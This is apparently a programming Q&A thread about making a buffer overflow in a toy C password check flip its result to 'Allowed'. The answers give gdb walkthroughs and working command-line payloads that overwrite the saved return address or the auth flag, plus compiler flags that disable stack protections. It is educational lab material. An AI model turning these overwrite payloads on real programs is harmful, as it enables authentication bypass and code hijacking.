# Attempting a buffer overflow

Tags: c, buffer-overflow

I am attempting to change the result of a function using a buffer overflow to change the results on the stack with the following code:

```
#include <stdio.h>
#include <string.h>
#include <stdlib.h>


int check_auth1(char *password) 
{
    char password_buffer[8];
    int auth_flag = 0;
    strcpy(password_buffer, password);
    if (strcmp(password_buffer, "cup") == 0) {
        auth_flag = 1;
    }
    return auth_flag;
}
int main(int argc, char **argv)
{
    if (argc < 2) {
        printf("Usage: %s <password>\n", argv[0]);
        exit(0);
    }
    int authenticated = check_auth1(argv[1]);
    if (authenticated != 1) {
        printf("NOT Allowed.\n");
    } else {
        printf("Allowed.\n");
    }
    return 0;
}
```

I'm using gdb to analyse the stack and this is what I have:

```
0xbffff6d0: 0xbffff8e4  0x0000002f  0xbffff72c  0xb7fd0ff4
0xbffff6e0: 0x08048540  0x08049ff4  0x00000002  0x0804833d
0xbffff6f0: 0x00000000  0x00000000  0xbffff728  0x0804850f
0xbffff700: 0xbffff901  0xb7e5e196  0xb7fd0ff4  0xb7e5e225
0xbffff710: 0xb7fed280  0x00000000  0x08048549  0xb7fd0ff4
0xbffff720: 0x08048540  0x00000000  0x00000000  0xb7e444d3
0xbffff730: 0x00000002  0xbffff7c4  0xbffff7d0  0xb7fdc858
0xbffff740: 0x00000000  0xbffff71c  0xbffff7d0  0x00000000


    [1] $ebp                0xbffff6f8
    [2] $esp                0xbffff6d0
    [3] password            0xbffff700
    [4] auth_flag           0xbffff6ec
    [5] password_buffer     0xbffff6e4


   0x080484ce <+0>: push   %ebp
   0x080484cf <+1>: mov    %esp,%ebp
   0x080484d1 <+3>: and    $0xfffffff0,%esp
   0x080484d4 <+6>: sub    $0x20,%esp
   0x080484d7 <+9>: cmpl   $0x1,0x8(%ebp)
   0x080484db <+13>:    jg     0x80484ff <main+49>
   0x080484dd <+15>:    mov    0xc(%ebp),%eax
   0x080484e0 <+18>:    mov    (%eax),%edx
   0x080484e2 <+20>:    mov    $0x8048614,%eax
   0x080484e7 <+25>:    mov    %edx,0x4(%esp)
   0x080484eb <+29>:    mov    %eax,(%esp)
   0x080484ee <+32>:    call   0x8048360 <printf@plt>
   0x080484f3 <+37>:    movl   $0x0,(%esp)
   0x080484fa <+44>:    call   0x80483a0 <exit@plt>
   0x080484ff <+49>:    mov    0xc(%ebp),%eax
   0x08048502 <+52>:    add    $0x4,%eax
   0x08048505 <+55>:    mov    (%eax),%eax
   0x08048507 <+57>:    mov    %eax,(%esp)
   ----------
   IMPORTANT STUFF STARTS NOW
   0x0804850a <+60>:    call   0x8048474 <check_auth1>
   0x0804850f <+65>:    mov    %eax,0x1c(%esp)
   0x08048513 <+69>:    cmpl   $0x1,0x1c(%esp)
   0x08048518 <+74>:    je     0x8048528 <main+90>
```

I determined how far apart $ebp is from &password_buffer: 0xbffff6f8 - 0xbffff6e4 = 14 bytes

So with 14 'A' input, i.e. `./stackoverflowtest $(perl -e 'print "A" x 14')` it should take me to "Allowed".

Where am I going wrong? What is the needed input to cause a overflow?

ASLR and gcc canaries are turned off.

check_auth1 assembly dump:

```
Dump of assembler code for function check_auth1:
   0x08048474 <+0>: push   %ebp
   0x08048475 <+1>: mov    %esp,%ebp
   0x08048477 <+3>: push   %edi
   0x08048478 <+4>: push   %esi
   0x08048479 <+5>: sub    $0x20,%esp
=> 0x0804847c <+8>: movl   $0x0,-0xc(%ebp)
   0x08048483 <+15>:    mov    0x8(%ebp),%eax
   0x08048486 <+18>:    mov    %eax,0x4(%esp)
   0x0804848a <+22>:    lea    -0x14(%ebp),%eax
   0x0804848d <+25>:    mov    %eax,(%esp)
   0x08048490 <+28>:    call   0x8048370 <strcpy@plt>
   0x08048495 <+33>:    lea    -0x14(%ebp),%eax
   0x08048498 <+36>:    mov    %eax,%edx
   0x0804849a <+38>:    mov    $0x8048610,%eax
   0x0804849f <+43>:    mov    $0x4,%ecx
   0x080484a4 <+48>:    mov    %edx,%esi
   0x080484a6 <+50>:    mov    %eax,%edi
   0x080484a8 <+52>:    repz cmpsb %es:(%edi),%ds:(%esi)
   0x080484aa <+54>:    seta   %dl
   0x080484ad <+57>:    setb   %al
   0x080484b0 <+60>:    mov    %edx,%ecx
   0x080484b2 <+62>:    sub    %al,%cl
   0x080484b4 <+64>:    mov    %ecx,%eax
   0x080484b6 <+66>:    movsbl %al,%eax
   0x080484b9 <+69>:    test   %eax,%eax
   0x080484bb <+71>:    jne    0x80484c4 <check_auth1+80>
   0x080484bd <+73>:    movl   $0x1,-0xc(%ebp)
   0x080484c4 <+80>:    mov    -0xc(%ebp),%eax
   0x080484c7 <+83>:    add    $0x20,%esp
   0x080484ca <+86>:    pop    %esi
   0x080484cb <+87>:    pop    %edi
   0x080484cc <+88>:    pop    %ebp
   0x080484cd <+89>:    ret
```

Comment: @andrewcooke Fixed it now, sorry! Yes it compiles.

Comment: Can you post the generated assembly  for `check_auth1` as well ?

Comment: Didn't you mean *buffer overflow*, not *stack overflow*?

Comment: Agreed with paddy. You're not going to blow up the runtime stack with this code..buffer overflow possibly

Comment: @zakinster Added
Yes, buffer overflow sorry.

Answer (score 3, accepted):

This is quite easy to exploit, here is the way to walk through.

First compile it with `-g`, it makes it easier to understand what you are doing. Then, our goal will be to rewrite the saved `eip` of `check_auth1()` and move it to the else-part of the test in the `main()` function.

```
$> gcc -m32 -g -o vuln vuln.c
$> gdb ./vuln
...
(gdb) break check_auth1
Breakpoint 1 at 0x80484c3: file vulne.c, line 9.
(gdb) run `python -c 'print("A"*28)'`
Starting program: ./vulne `python -c 'print("A"*28)'`
Breakpoint 1,check_auth1 (password=0xffffd55d 'A' <repeats 28 times>) at vuln.c:9
9       int auth_flag = 0;
(gdb) info frame
Stack level 0, frame at 0xffffd2f0:
 eip = 0x80484c3 in check_auth1 (vuln.c:9); saved eip 0x804853f
 called by frame at 0xffffd320
 source language c.
 Arglist at 0xffffd2e8, args: password=0xffffd55d 'A' <repeats 28 times>
 Locals at 0xffffd2e8, Previous frame's sp is 0xffffd2f0
 Saved registers:
   ebp at 0xffffd2e8, eip at 0xffffd2ec
```

We stopped at `check_auth1()` and displayed the stack frame. We saw that the saved `eip` is stored in the stack at `0xffffd2ec` and contains `0x804853f`.

Let see to what it does lead:

```
(gdb) disassemble main
Dump of assembler code for function main:
   0x080484ff <+0>:     push   %ebp
   0x08048500 <+1>:     mov    %esp,%ebp
   0x08048502 <+3>:     and    $0xfffffff0,%esp
   0x08048505 <+6>:     sub    $0x20,%esp
   0x08048508 <+9>:     cmpl   $0x1,0x8(%ebp)
   0x0804850c <+13>:    jg     0x804852f <main+48>
   0x0804850e <+15>:    mov    0xc(%ebp),%eax
   0x08048511 <+18>:    mov    (%eax),%eax
   0x08048513 <+20>:    mov    %eax,0x4(%esp)
   0x08048517 <+24>:    movl   $0x8048604,(%esp)
   0x0804851e <+31>:    call   0x8048360 <printf@plt>
   0x08048523 <+36>:    movl   $0x0,(%esp)
   0x0804852a <+43>:    call   0x80483a0 <exit@plt>
   0x0804852f <+48>:    mov    0xc(%ebp),%eax
   0x08048532 <+51>:    add    $0x4,%eax
   0x08048535 <+54>:    mov    (%eax),%eax
   0x08048537 <+56>:    mov    %eax,(%esp)
   0x0804853a <+59>:    call   0x80484bd <check_auth1>
   0x0804853f <+64>:    mov    %eax,0x1c(%esp)   <-- We jump here when returning
   0x08048543 <+68>:    cmpl   $0x1,0x1c(%esp)
   0x08048548 <+73>:    je     0x8048558 <main+89>
   0x0804854a <+75>:    movl   $0x804861a,(%esp)
   0x08048551 <+82>:    call   0x8048380 <puts@plt>
   0x08048556 <+87>:    jmp    0x8048564 <main+101>
   0x08048558 <+89>:    movl   $0x8048627,(%esp) <-- We want to jump here
   0x0804855f <+96>:    call   0x8048380 <puts@plt>
   0x08048564 <+101>:   mov    $0x0,%eax
   0x08048569 <+106>:   leave  
   0x0804856a <+107>:   ret    
End of assembler dump.
```

But the truth is that we want to avoid to go through the `cmpl $0x1,0x1c(%esp)` and go directly to the else-part of the test. Meaning that we want to jump to `0x08048558`.

Anyway, lets first try to see if our 28 '`A`' are enough to rewrite the saved `eip`.

```
(gdb) next
10      strcpy(password_buffer, password);
(gdb) next
11      if (strcmp(password_buffer, "cup") == 0) {
```

Here, the `strcpy` did the overflow, so lets look at the stack-frame:

```
(gdb) info frame
Stack level 0, frame at 0xffffd2f0:
 eip = 0x80484dc in check_auth1 (vulnerable.c:11); saved eip 0x41414141
 called by frame at 0xffffd2f4
 source language c.
 Arglist at 0xffffd2e8, args: password=0xffffd55d 'A' <repeats 28 times>
 Locals at 0xffffd2e8, Previous frame's sp is 0xffffd2f0
 Saved registers:
  ebp at 0xffffd2e8, eip at 0xffffd2ec
```

Indeed, we rewrote the saved eip with '`A`' (`0x41` is the hexadecimal code for `A`). And, in fact, 28 is exactly what we need, not more. If we replace the four last bytes by the target address it will be okay.

One thing is that you need to reorder the bytes to take the little-endianess into account. So, `0x08048558` will become `\x58\x85\x04\x08`.

Finally, you will also need to write some meaningful address for the saved `ebp` value (not `AAAA`), so my trick is just to double the last address like this:

```
$> ./vuln `python -c 'print("A"*20 + "\x58\x85\x04\x08\x58\x85\x04\x08")'`
```

Note that there is no need to disable the ASLR, because you are jumping in the `.text` section (and this section do no move under the ASLR). But, you definitely need to disable canaries.

**EDIT**: I was wrong about replacing the saved `ebp` by our saved `eip`. In fact, if you do not give the right `ebp` you will hit a segfault when attempting to exit from `main`. This is because, we did set the saved `ebp` to somewhere in the `.text` section and, even if there is no problem when returning from `check_auth1`, the stack frame will be restored improperly when returning in the `main` function (the system will believe that the stack is located in the code). The result will be that the 4 bytes above the address pointed by the saved `ebp` we wrote (and pointing to the instructions) will be mistaken with the saved `eip` of `main`. So, either you disable the ASLR and write the correct address of the saved `ebp` (`0xffffd330`) which will lead to

```
 $> ./vuln `python -c 'print("A"*20 + "\xff\xff\xd3\x30\x58\x85\x04\x08")'`
```

Or, you need to perform a ROP that will perform a clean `exit(0)` (which is usually quite easy to achieve).

Answer (score 3):

you're checking against 1 exactly; change it to (the much more normal style for c programming)

```
if (! authenticated) {
```

and you'll see that it is working (or run it in gdb, or print out the flag value, and you'll see that the flag is being overwritten nicely, it's just not 1).

remember that an int is made of multiple chars.  so setting a value of exactly 1 is hard, because many of those chars need to be zero (which is the string terminator).  instead you are getting a value like 13363 (for the password 12345678901234).

[huh; valgrind doesn't complain even with the overflow.]

**UPDATE**

ok, here's how to do it with the code you have.  we need a string with 13 characters, where the final character is ASCII 1.  in bash:

```
> echo -n "123456789012" > foo
> echo $'\001' >> foo
> ./a.out `cat foo`
Allowed.
```

where i am using

```
  if (authenticated != 1) {
    printf("NOT Allowed.\n");
  } else {
    printf("Allowed.\n");
  }
```

also, i am relying on the compiler setting some unused bytes to zero (little endian; 13th byte is 1 14-16th are 0).  it works with `gcc bo.c` but not with `gcc -O3 bo.c`.

the other answer here gets around this by walking on to the next place that can be overwritten usefully (i assumed you were targeting the auth_flag variable since you placed it directly after the password).

Comment: Is a buffer overflow not possible without modifying the C code at all? I thought it can be overflowed by calculating precisely how many bytes the input should be.

Comment: yes; you are overflowing.  but `auth_flag` is being set to some value like 54232437435.  run it in gdb and look.

Comment: Interesting how the code will actually work properly even with the buffer overflow because you're checking for 1 _exactly._

This also shows why it's a very **very** bad idea to use `strcpy`.

Comment: @rm5248 - _This also shows why it's a very very bad idea to use strcpy_ would add:  _in this way_  (i.e., strcpy is very useful when used appropriately)

Comment: @ryyker I can't think of a valid use for strcpy... unless using a library that doesn't have the bounds checked strncpy which has its own pitfall of not terminating if the limit is met... and then will potentially give bad values for strlen...

Answer (score 2):

> ```
> strcpy(password_buffer, password);
> ```

One of the things you will need to address during testing is this function call. If the program seg faults, then it could be because of FORTIFY_SOURCE. I'd like to say "crashes unexpectedly", but I don't think that applies here ;)

FORTIFY_SOURCE uses "safer" variants of high risk functions like `memcpy` and `strcpy`. The compiler uses the safer variants when it can deduce the destination buffer size. If the copy would exceed the destination buffer size, then the program calls `abort()`.

To disable FORTIFY_SOURCE for your testing, you should compile the program with `-U_FORTIFY_SOURCE` or `-D_FORTIFY_SOURCE=0`.